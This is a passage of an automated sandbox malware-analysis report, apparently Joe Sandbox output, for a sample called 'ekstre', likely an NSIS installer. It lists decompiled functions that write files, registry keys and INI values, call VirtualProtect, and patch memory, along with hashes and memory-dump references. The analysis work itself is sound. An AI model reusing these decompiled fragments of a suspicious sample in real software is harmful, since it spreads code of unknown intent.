Instruction Fuzzy Hash: CBE09272904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D1DA784D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 184fefecf11b200ec887526f95b23b7113d082bb34b486563eb4c55910b4c701
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 184fefecf11b200ec887526f95b23b7113d082bb34b486563eb4c55910b4c701
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x0040650d
0x00406516
0x0040652c
0x00000000
0x0040652c
0x0040651a
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00426638,0041E6F0,00403579,0041E6F0,00426638,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD1A4A Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ddd5014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ddd501c, 4, 0x40, 0x6ddd5034); // executed
					 *0x6ddd501c = 0xc2;
					 *0x6ddd5034 = 0;
					 *0x6ddd5030 = 0;
					 *0x6ddd502c = 0;
					 *0x6ddd5028 = 0;
					 *0x6ddd5024 = 0;
					 *0x6ddd5020 = 0;
					 *0x6ddd501e = 0;
				}
				return 1;
			}

0x6ddd1a53
0x6ddd1a58
0x6ddd1a68
0x6ddd1a70
0x6ddd1a77
0x6ddd1a7d
0x6ddd1a83
0x6ddd1a89
0x6ddd1a8f
0x6ddd1a95
0x6ddd1a9b
0x6ddd1a9b
0x6ddd1aa4

APIs

VirtualProtect.KERNELBASE(6DDD501C,00000004,00000040,6DDD5034), ref: 6DDD1A68

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b50482ffc51b8b3452efbeefd62b4c9162be7db4178e8c55bc08eb579509e695
Instruction ID: 8dce1e5fc0fbe2e56166bbdbe16135203f5e67a1b2c3c0c787e849498b5b7d55
Opcode Fuzzy Hash: b50482ffc51b8b3452efbeefd62b4c9162be7db4178e8c55bc08eb579509e695
Instruction Fuzzy Hash: 04F045B09D9341DAFF28AF289544B397AF0F71B356B00852EF249DA34DC37041059B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6("true");
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x1fff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x004023f4
0x004023fb
0x004023fe
0x0040240e
0x00402425
0x0040242b
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00001FFF,00000000), ref: 00402425

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 210e41e90cc4476470c523a56b16d4e933cddf3ab29d9eeaca7bf88670a16564
Instruction ID: 63e8f7b799cb3657af5f074fa60520448859c90a9d61b20944fb8e64719fc74d
Opcode Fuzzy Hash: 210e41e90cc4476470c523a56b16d4e933cddf3ab29d9eeaca7bf88670a16564
Instruction Fuzzy Hash: 60E04F31C00229FADF10AFA0CD09EAD3668BF41340F14053AF510BB0D1E7FC89419789

Uniqueness

Uniqueness Score: -1.00%

Function 004064D5 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004064df
0x004064e6
0x004064f9
0x00000000
0x004064f9
0x004064ea
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cefb087c9d80b3f9053df4f6a597c871a19c59042e3e4714f5f6ff81dfd75dca
Instruction ID: a88e36bebcdf0c9761df9b198431a3a43784d159b2a05bff8a571b36665a5571
Opcode Fuzzy Hash: cefb087c9d80b3f9053df4f6a597c871a19c59042e3e4714f5f6ff81dfd75dca
Instruction Fuzzy Hash: 50D01772A08110DBDB11DBA8AA4CB9D73A4AB50368B208537D151F61D0EAB8C9459A1D

Uniqueness

Uniqueness Score: -1.00%

Function 004045C4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045C4(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextW(_v4, _v0 + 0x3e8, E004066A5(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}

0x004045de
0x004045e3

APIs

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000), ref: 004068A4

SetDlgItemTextW.USER32(?,?,00000000), ref: 004045DE

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ItemTextlstrcatlstrlen
String ID:
API String ID: 281422827-0
Opcode ID: 73b3e70f26523695344aa313222f8106b15ff01fe64d2e6c86eba35ea0453547
Instruction ID: ac81fd1055ba0297197cac3df011722fda0f302089e5b839fe348bc6695a069d
Opcode Fuzzy Hash: 73b3e70f26523695344aa313222f8106b15ff01fe64d2e6c86eba35ea0453547
Instruction Fuzzy Hash: 77C04C7554C300BFE641A755CC42F1FB799EF94319F04C92EB19DE11D1C63984309A2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x468238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404610
0x00404617
0x00404622
0x00000000
0x00404622
0x00404628

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9c430a585af9dead0ced1b9af2f98ef41eb9ba8c771f5b32e4223fd7c27f5ad5
Instruction ID: fa72961503f19785daae9782980f5036fb15b24dbeb52af421932fe0302741c0
Opcode Fuzzy Hash: 9c430a585af9dead0ced1b9af2f98ef41eb9ba8c771f5b32e4223fd7c27f5ad5
Instruction Fuzzy Hash: C6C08C70280A00BBDA108B108E04F023394A750701F144528B200E60E0DA74D000C61D

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x470268, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x00404607
0x0040460d

APIs

SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
